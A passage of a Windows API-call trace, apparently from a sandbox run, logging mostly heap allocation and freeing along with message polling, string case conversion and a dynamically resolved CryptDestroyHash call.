lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0257.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0257.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0257.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0257.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0257.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0257.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0257.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0257.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0257.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0257.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0257.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0257.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0257.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0257.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0257.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0257.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0257.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0257.908] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0257.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0257.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0257.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0257.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0257.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0257.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0257.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0257.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0257.909] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0257.909] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0257.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0257.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0257.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0257.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0257.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0257.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0257.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0257.909] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0257.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0257.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0257.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0257.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0257.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0257.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0257.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0257.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0257.910] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0257.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0257.910] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0257.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0257.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0257.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0257.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0257.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0257.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0257.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0257.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0257.910] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0257.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0257.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0257.911] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0257.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0257.911] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0257.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0257.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0257.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0257.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0257.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0257.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0257.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0257.911] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0257.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0257.911] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0257.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0257.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0257.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0257.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0257.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0257.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0257.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0257.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0257.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0257.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0257.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0257.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0257.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0257.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0257.912] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0257.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0257.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0257.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0257.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0257.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0257.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0257.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0257.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0257.913] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0257.913] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466e30, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0257.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0257.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0257.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0257.913] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0257.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0257.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0257.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0257.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0257.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0257.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0257.914] CryptDestroyHash (hHash=0xaa5760) returned 1 [0257.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0257.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0257.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0257.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0257.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0257.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0257.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0257.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0257.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0257.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0257.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0257.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0257.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0257.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0257.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0257.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0257.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0257.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0257.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0257.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0257.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0257.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0257.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0257.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0257.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0257.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0257.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0257.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0257.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0257.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0257.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0257.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0257.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0257.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0257.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0257.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0257.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0257.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0257.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0257.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0257.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0257.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0257.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0257.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0257.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0257.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0257.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0257.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0257.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0257.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0257.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0257.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0257.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0257.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0257.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0257.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0257.916] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0257.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0257.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0257.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0257.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0257.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0257.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0257.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0257.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0257.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0257.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0257.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0257.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0257.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0257.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0257.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0257.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0257.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0257.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0257.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0257.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0257.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0257.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0257.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0257.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0257.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0257.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0257.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0257.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0257.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0257.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0257.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0257.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0257.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0257.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0257.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0257.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0257.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0257.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0257.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0257.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0257.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0257.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0257.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0257.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0257.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 